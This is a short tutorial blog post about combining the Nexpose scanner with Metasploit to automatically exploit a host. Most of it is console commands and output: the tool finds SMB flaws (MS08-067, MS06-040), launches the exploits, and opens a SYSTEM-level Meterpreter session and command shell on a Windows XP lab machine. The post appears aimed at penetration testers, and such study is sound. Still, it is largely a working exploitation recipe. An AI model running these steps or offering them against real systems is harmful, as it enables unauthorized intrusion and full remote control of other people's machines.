Nexpose + Metasploit = Shell | www.SecurityXploded.com

Today's Deals

Nexpose + Metasploit = Shell

Author: Manjunath aka Punter

Contents

Introduction
Get into action with Nexpose + Metasploit
References

Introduction

Today we will see how to use Nexpose [Reference 2] - a Open Source Vulnerability Scanner through Metasploit Framework (MSF) [Reference 1].

Metasploit has Nexpose plugin where we can login to Nexpose scan the Target System and import the Scan Results to Metasploit then MSF will check for the exploits Matching those vulnerabilities and it automatically run those exploits if the target system is vulnerable then get us a Interactive Shell.

Get into action with Nexpose + Metasploit

Let the action begin...with following steps

Run the Nexpose scanner
Start the Metasploit Framework

Here is what you will see once you fire up Metasploit

root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:netxoseloginpassword@127.0.0.1

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


check out the below Interactive text Snapshot

root@bt:/pentest/exploits/framework3# ./msfconsole

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

____ _ _ _____ _ _ __ __
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | '_ \| |/ _` | / / | \| |/ _ \\ /| '_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:netxoseloginpassword@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter...
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.102:445 exploit/windows/smb/ms08_067_netapi (...)
[*] 192.168.0.102:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi ...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi ...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) 
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ TESTBOX-85474D5 192.168.0.104:18282 -> 
192.168.0.102:1067 exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit

As Nexpose is busy performing scan & exploitation on the remote target, you can check out any successful remote sessions through 'sessions' command as shown above. Then you can switch into the respective session and gather more information.

References